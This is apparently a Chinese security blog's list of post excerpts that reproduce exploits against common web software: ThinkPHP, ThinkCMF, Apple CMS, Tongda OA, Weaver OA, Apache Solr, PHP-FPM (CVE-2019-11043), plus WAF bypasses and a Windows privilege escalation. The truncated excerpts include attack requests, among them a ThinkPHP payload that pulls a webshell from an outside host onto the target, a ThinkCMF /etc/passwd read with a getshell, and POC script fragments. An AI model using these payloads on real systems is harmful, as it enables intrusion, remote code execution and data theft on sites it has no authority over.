pipePotato 复现

原文  首发揭示!pipe土豆:一种新型的通用提权细分 传递了一个asp 的木马 执行权限为iis 运行e...

通达OA 任意文件上传 复现和代码分析

说明一下 文件包含的文件只有2017和v11有   然后我这边是拿的一个2013 增强版做测试的。所以默认是没有那个文件包含的。只是作为演示 一、环境搭建 http://www.tongda2000...

密码保护:bypass 各大waf

1. 百度云盾 (好像是CF的东西) POST  POST / HTTP/1.1 Host: www.sglynp.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5....

苹果CMS V8 绕过前台RCE

POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...

thinkphp payload

POST /index.php?s=captcha&&Fuck=copy(%22http://www.o2oxy.cn/webshell/ali.txt%22,%22test.php%22) HTTP/1.1 Host: aaa.kkt99.top Content-Length: 76 Cache-Control: max-age=0 Origin: null Co...

Apache Solr 命令执行

使用Docker docker pull solr docker run --name solr2 -d -p 8081:8983 solr 验证脚本 #!/usr/bi...

ThinkCMF RCE

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

泛微OA数据库配置信息泄漏 POC

# -*- coding:utf-8 -*- #Author:print("") import pyDes,requests import sys def desdecode(secret_key,s): cipherX = pyDes.des(' ') cipherX.setKey(secret_key) y = ciphe...

CVE-2019-11043 PHP RCE 复现

这里用的是Docker 镜像 docker pull php:7.2.3-fpm docker pull nginx 然后启动一个php  echo '<?php phpinfo();>' /var/www/html/index.php docker run --n...